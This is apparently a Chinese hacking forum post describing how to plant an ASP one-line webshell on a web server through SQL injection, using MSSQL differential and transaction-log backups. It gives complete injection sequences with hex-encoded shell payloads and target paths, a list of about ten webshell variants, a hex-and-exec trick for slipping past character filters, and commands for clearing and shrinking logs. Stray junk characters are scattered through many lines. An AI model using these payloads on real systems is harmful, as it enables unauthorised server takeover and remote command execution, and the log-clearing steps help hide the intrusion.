MSsql差异备份总结

admin

差异备份的流程大概这样：
1.完整备份一次(保存位置当然可以改)
backup database 库名 to disk = 'c:\ddd.bak';--
, V& R2 Q) n4 {8 |5 t) U: q  D6 d
2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
3 b* U: N  L! n( l: b- C6 zinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--

6 K/ T- l* d' o" G( p3.进行差异备份
2 }7 O5 V8 A: l( ]9 p( ubackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

1 J/ O% p- o" G* F. |: M上面
0x3C25657865637574652872657175657374282261222929253E
7 w9 w! r* X2 N, h4 e- j/ B6 y1 N) _# z就是一句话木马的内容：<%execute(request("a"))%>
/ G5 K' `' k% L* C6 [! C* ~
如下是网上常见的差异备份代码，思路一样！
===================================================
9 C( \' U3 ~  E$ e利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:
" R+ ^9 P; u  V2 `( }
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库

create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表


insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中
  V0 c$ U2 w: b6 w% T& }. t9 j
2 _! w  y9 C' N9 W2 D; [declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份

) w1 s! {. u5 l- idrop table [xiaolu]  -- 删除此表。
4 Z( W+ Z& {+ t) v
0x77006F006B0061006F002E00620061006B00为wokao.bak
2 ~/ h6 Y9 F) Q1 e0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
8 r5 y) f$ D2 @0 H0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp

  g7 f) e. v5 b5 t' A! N0 ~声明：方法不是我想的，我只是写工具，默认得到shell是
<%execute(request("a"))%>
===============================================================
0 x; h. b  G/ U, ?) p. F) l5 l
$ R' z5 O3 L7 x- i我发现上面代码，有时会无效，而直接用

backup database 库名 to disk = 'c:\ddd.bak'
4 D1 a$ q1 T$ j7 p4 n5 j1 _0 n
create table [dbo].[dtest] ([cmd] [image]);

1 F! A1 S8 p6 E* e7 Yinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
  }* k3 `5 O. c$ k
" g1 X) ]/ r* d  {$ J4 U; M8 [  T/ i却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！
5 B5 `- I9 _: N( T) d7 m: g- f" L
库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！
( J' P9 g7 e$ L; M
3 ?2 ], N1 p- X9 d- i" e网上还有log增量备份的，我也把他记录一下
=====================================================
另一种log增量备份技术:
3 c1 }  Q. G# z
- Y& \1 K  L, S% n% U6 O. V';alter database null set RECOVERY FULL--

';create table cmd (a image)--
; R0 w. M! y) Q8 L, \
% p, L1 n2 ]) S3 A';backup log null to disk = 'f:\cmd' with init--

';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--

';backup log null to disk = '备份路径'--
! o" t$ m: U* |2 V! {
';drop table cmd--

';alter database XXX set RECOVERY SIMPLE--

PS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话小马16进制转来的

说到一句话马，还可以有这么几种写法：

9 T8 e" d* `4 Ba)<%%25Execute(request("a"))%%25>
6 V- V) x$ Q. c/ z2 r9 u; Q5 q- m( Wb)<%Execute(request("a"))%>
7 z6 ^; z6 n- ?+ Jc)%><%execute request("a")%><%
d)<script language=VBScript runat=server>execute request("a")</script>
7 `. o& Q1 C' C( H( Ke)<%25Execute(request("a"))%25>
) U0 z3 |. A9 t8 U8 H2 r, J3 Yf)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
5 M5 n+ ~: c/ I7 [1 C. N8 g' ~9 ph)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
4 _- y, P# J& vI)<%eval request(0)%>
J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话
) U. ]9 C' {& r- }% \
- x: [8 T3 V" n4 y' T6 S" U: v=============================================
+ E1 B- x+ Q6 M8 r
6 m. Q2 T  C, R- w% n当遇到差备过滤了/时用这个语句代替
! {1 |9 d7 {# e
declare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--

把要执行的语句转16进制然后用exec执行


减少备份文件大小方法如下:
2 V. h: h: V/ a$ C; x1 \! a4 ]: x
总的来说就是那么简单几句,下面以备份数据库model为例子
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2
id=1;backup database model to disk='你的路径‘ with differential,format;--
0 Q, t$ ]7 q, l/ |* q

9 d8 |) Q/ C& P1 U4 Z, b) Y# U5 \
SQL语句清理日志
注：test为数据库名
( g3 J* \( x+ p" S2 r0 H
--清空日志
DUMP TRANSACTION test WITH NO_LOG

2 n3 b9 ~& B' X% |8 L8 a# @# ^--截断事务日志
* c# ^  B' [" X) U7 v7 n, `BACKUP LOG test WITH NO_LOG

( r, H  }/ L3 G9 V! y--收缩数据库
DBCC SHRINKDATABASE(test)
0 q; G' L; `- K0 _' {
! d8 S4 Q4 w$ D8 a* E--收缩指定数据文件,1是文件号,可以通过这个语句查询到
Select * from sysfiles DBCC SHRINKFILE(1)

) y. c1 N* X2 M! o  i--以后能自动收缩
7 h8 b, G* }0 h% @3 V/ F: L! H+ QEXEC sp_dboption 'test', 'autoshrink', 'TRUE'